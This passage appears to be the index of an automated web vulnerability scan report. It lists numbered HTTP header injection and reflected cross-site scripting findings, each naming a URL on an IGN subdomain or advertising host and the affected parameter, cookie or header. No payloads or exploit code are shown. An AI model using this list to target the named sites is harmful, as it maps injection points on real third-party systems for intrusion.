1.44. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Isllrd,bguRrblewbsuu [REST URL parameter 2]

1.45. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bIdRvss,bguRqRgbdmoWp [REST URL parameter 2]

1.46. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwkajIr,bguRrfrbdmWad [REST URL parameter 2]

1.47. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bmgrptj,bguRragewbmAq [REST URL parameter 2]

1.48. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

1.49. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

1.50. http://movies.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

1.51. http://ps3.ign.com/ [MSCulture cookie]

1.52. http://ps3.ign.com/index/latest-updates.html [User-Agent HTTP header]

1.53. http://ps3.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.54. http://ps3.ign.com/index/psn-games.html [Referer HTTP header]

1.55. http://ps3.ign.com/index/videos.html [Referer HTTP header]

1.56. http://xbox360.ign.com/ [optimizelyBuckets cookie]

2. HTTP header injection

2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.2. http://cheats.ign.com/ [freq cookie]

2.3. http://cheats.ign.com/index/cheats/index.html [freq cookie]

2.4. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [freq cookie]

2.5. http://cheats.ign.com/index/pc-cheats/index.html [freq cookie]

2.6. http://cheats.ign.com/index/playstation-3-cheats/index.html [freq cookie]

2.7. http://cheats.ign.com/index/playstation-portable-cheats/index.html [freq cookie]

2.8. http://cheats.ign.com/index/wii-cheats/index.html [freq cookie]

2.9. http://cheats.ign.com/index/xbox-360-cheats/index.html [freq cookie]

2.10. http://cheats.ign.com/ob2/068/001/001317.html [freq cookie]

2.11. http://cheats.ign.com/ob2/068/038/038020.html [freq cookie]

2.12. http://cheats.ign.com/ob2/068/077/077644.html [freq cookie]

2.13. http://cheats.ign.com/ob2/068/077/077723.html [freq cookie]

2.14. http://cheats.ign.com/ob2/068/142/14235018.html [freq cookie]

2.15. http://cheats.ign.com/sendcheats.html [freq cookie]

2.16. http://corp.ign.com/properties/ign.html [freq cookie]

2.17. http://ubt.ign.com/record [Raisin2 cookie]

2.18. http://wrapper.ign.com/a [freq cookie]

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]

3.2. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]

3.3. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]

3.4. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]

3.5. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]

3.6. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]

3.7. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]

3.8. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]

3.9. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]

3.10. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_adid parameter]

3.11. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]

3.12. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [mt_id parameter]

3.13. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]

3.14. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [redirect parameter]

3.15. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]

3.16. http://ad.doubleclick.net/adj/N4881.mmath/B5233701.14 [sz parameter]

3.17. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]

3.18. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]

3.19. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]

3.20. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]

3.21. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]

3.22. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]

3.23. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]

3.24. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]

3.25. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]

3.26. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]

3.27. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]

3.28. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]

3.29. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]

3.30. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]

3.31. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]

3.32. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]

3.33. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]

3.34. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]

3.35. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]

3.36. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]

3.37. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]

3.38. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]

3.39. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]

3.40. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]

3.41. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]

3.42. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]

3.43. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]

3.44. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]

3.45. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]

3.46. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]

3.47. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.48. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

3.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

3.50. http://ads.adxpose.com/ads/ads.js [uid parameter]

3.51. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

3.52. http://au.ign.com/ [name of an arbitrarily supplied request parameter]

3.53. http://au.ign.com/ [name of an arbitrarily supplied request parameter]

3.54. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.55. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.56. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.57. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.58. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.59. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.60. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.61. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.62. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]

3.63. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]

3.64. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

3.65. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

3.66. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.67. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.68. http://boards.ign.com/ [name of an arbitrarily supplied request parameter]

3.69. http://boards.ign.com/comics_boards/c5025 [name of an arbitrarily supplied request parameter]

3.70. http://boards.ign.com/game_help_community_board/b5143/p1 [name of an arbitrarily supplied request parameter]

3.71. http://boards.ign.com/general_game_help_board/b5030/p1 [name of an arbitrarily supplied request parameter]

3.72. http://boards.ign.com/movies/c5017 [name of an arbitrarily supplied request parameter]

3.73. http://boards.ign.com/nintendo_wii_ds_boards/c5062 [name of an arbitrarily supplied request parameter]

3.74. http://boards.ign.com/pc_games_and_more/c5060 [name of an arbitrarily supplied request parameter]

3.75. http://boards.ign.com/playstation_boards/c5058 [name of an arbitrarily supplied request parameter]

3.76. http://boards.ign.com/tv/c5026 [name of an arbitrarily supplied request parameter]

3.77. http://boards.ign.com/xbox_360_boards/c5056 [name of an arbitrarily supplied request parameter]

3.78. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]

3.79. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]

3.80. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]

3.81. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]

3.82. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]

3.83. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]

3.84. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]

3.85. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]

3.86. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]

3.87. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]

3.88. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]

3.89. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]

3.90. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]

3.91. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]

3.92. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]

3.93. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]

3.94. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]

3.95. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]

3.96. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]

3.97. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]

3.98. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]

3.99. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]

3.100. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]

3.101. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]

3.102. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]

3.103. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]

3.104. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]

3.105. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]

3.106. http://club.ign.com/b/api/objects/user.js [callback parameter]

3.107. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]

3.108. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]

3.109. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]

3.110. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]

3.111. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]

3.112. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]

3.113. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]

3.114. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]

3.115. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

3.116. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

3.117. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

3.118. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

3.119. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

3.120. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

3.121. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

3.122. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]

3.123. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

3.124. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

3.125. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.126. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.127. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]

3.128. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]

3.129. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]

3.130. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]

3.131. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]

3.132. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]

3.133. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]

3.134. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]

3.135. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

3.136. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

3.137. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]

3.138. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]

3.139. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]

3.140. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]

3.141. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]

3.142. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]

3.143. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]

3.144. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]

3.145. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]

3.146. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]

3.147. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]

3.148. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]

3.149. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]

3.150. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]

3.151. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

3.152. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

3.153. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

3.154. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

3.155. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

3.156. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

3.157. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

3.158. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

3.159. http://ds.ign.com/index/latest-updates.html [types parameter]

3.160. http://ds.ign.com/index/latest-updates.html [types parameter]

3.161. http://ds.ign.com/index/latest-updates.html [types parameter]

3.162. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

3.163. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

3.164. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

3.165. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

3.166. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.167. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.168. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

3.169. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

3.170. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

3.171. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

3.172. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]

3.173. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]

3.174. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]

3.175. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]

3.176. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

3.177. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

3.178. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.179. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

3.180. http://event.adxpose.com/event.flow [uid parameter]

3.181. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]

3.182. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]

3.183. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]

3.184. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]

3.185. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]

3.186. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]

3.187. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]

3.188. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]

3.189. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

3.190. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]

3.191. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]

3.192. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]

3.193. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

3.194. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]

3.195. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]

3.196. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]

3.197. http://fimserve.ign.com/ [__ipculture parameter]

3.198. http://fimserve.ign.com/ [__preferredculture parameter]

3.199. http://fimserve.ign.com/ [name of an arbitrarily supplied request parameter]

3.200. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 1]

3.201. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 2]

3.202. http://fonts.ignimgs.com/wns6kpl.js [REST URL parameter 1]

3.203. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]

3.204. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]

3.205. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]

3.206. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]

3.207. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]

3.208. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]

3.209. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]

3.210. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]

3.211. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]

3.212. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]

3.213. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]

3.214. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]

3.215. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]

3.216. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]

3.217. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]

3.218. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]

3.219. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]

3.220. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]

3.221. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]

3.222. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]

3.223. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]

3.224. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]

3.225. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]

3.226. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]

3.227. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]

3.228. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]

3.229. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]

3.230. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]

3.231. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]

3.232. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]

3.233. http://guides.ign.com/index/playstation-3-guides/index.html [name of an arbitrarily supplied request parameter]

3.234. http://guides.ign.com/index/playstation-3-guides/index.html [name of an arbitrarily supplied request parameter]

3.235. http://guides.ign.com/index/playstation-portable-guides/index.html [name of an arbitrarily supplied request parameter]

3.236. http://guides.ign.com/index/playstation-portable-guides/index.html [name of an arbitrarily supplied request parameter]

3.237. http://guides.ign.com/index/wii-guides/index.html [name of an arbitrarily supplied request parameter]

3.238. http://guides.ign.com/index/wii-guides/index.html [name of an arbitrarily supplied request parameter]

3.239. http://guides.ign.com/index/xbox-360-guides/index.html [name of an arbitrarily supplied request parameter]

3.240. http://guides.ign.com/index/xbox-360-guides/index.html [name of an arbitrarily supplied request parameter]

3.241. http://ib.adnxs.com/ab [cnd parameter]

3.242. http://ib.adnxs.com/ab [referrer parameter]

3.243. http://ie.ign.com/ [name of an arbitrarily supplied request parameter]

3.244. http://ie.ign.com/ [name of an arbitrarily supplied request parameter]

3.245. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpck parameter]

3.246. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpck parameter]

3.247. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpvc parameter]

3.248. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_300x250_Q1_2011.html [mpvc parameter]

3.249. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpck parameter]

3.250. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpck parameter]

3.251. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpvc parameter]

3.252. http://img.mediaplex.com/content/0/17339/119294/PCMag_PCMag_728x90_Q1_2011.html [mpvc parameter]

3.253. http://insider.ign.com/ [name of an arbitrarily supplied request parameter]

3.254. http://insider.ign.com/ [name of an arbitrarily supplied request parameter]

3.255. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]

3.256. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]

3.257. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]

3.258. http://js.revsci.net/gateway/gw.js [csid parameter]

3.259. http://landlanss.gfi.com/freeware-network-security-scanner-sm/ [REST URL parameter 1]

3.260. http://media.ds.ign.com/media/059/059687/imgs_1.html [name of an arbitrarily supplied request parameter]

3.261. http://media.ds.ign.com/media/059/059687/imgs_1.html [name of an arbitrarily supplied request parameter]

3.262. http://media.ps3.ign.com/media/143/14324403/imgs_1.html [name of an arbitrarily supplied request parameter]

3.263. http://media.ps3.ign.com/media/143/14324403/imgs_1.html [name of an arbitrarily supplied request parameter]

3.264. http://media.xbox360.ign.com/media/064/064330/imgs_1.html [name of an arbitrarily supplied request parameter]

3.265. http://media.xbox360.ign.com/media/064/064330/imgs_1.html [name of an arbitrarily supplied request parameter]

3.266. http://media.xbox360.ign.com/media/070/070921/imgs_1.html [name of an arbitrarily supplied request parameter]

3.267. http://media.xbox360.ign.com/media/070/070921/imgs_1.html [name of an arbitrarily supplied request parameter]

3.268. http://media.xbox360.ign.com/media/080/080342/imgs_1.html [name of an arbitrarily supplied request parameter]

3.269. http://media.xbox360.ign.com/media/080/080342/imgs_1.html [name of an arbitrarily supplied request parameter]

3.270. http://movies.ign.com/ [name of an arbitrarily supplied request parameter]

3.271. http://movies.ign.com/ [name of an arbitrarily supplied request parameter]

3.272. http://movies.ign.com/articles/114/1141199p1.html [name of an arbitrarily supplied request parameter]

3.273. http://movies.ign.com/articles/114/1141199p1.html [name of an arbitrarily supplied request parameter]

3.274. http://movies.ign.com/articles/114/1142532p1.html [name of an arbitrarily supplied request parameter]

3.275. http://movies.ign.com/articles/114/1142532p1.html [name of an arbitrarily supplied request parameter]

3.276. http://movies.ign.com/articles/114/1145692p1.html [name of an arbitrarily supplied request parameter]

3.277. http://movies.ign.com/articles/114/1145692p1.html [name of an arbitrarily supplied request parameter]

3.278. http://movies.ign.com/articles/114/1146818p1.html [name of an arbitrarily supplied request parameter]

3.279. http://movies.ign.com/articles/114/1146818p1.html [name of an arbitrarily supplied request parameter]

3.280. http://movies.ign.com/articles/114/1146819p1.html [name of an arbitrarily supplied request parameter]

3.281. http://movies.ign.com/articles/114/1146819p1.html [name of an arbitrarily supplied request parameter]

3.282. http://movies.ign.com/articles/114/1147900p1.html [name of an arbitrarily supplied request parameter]

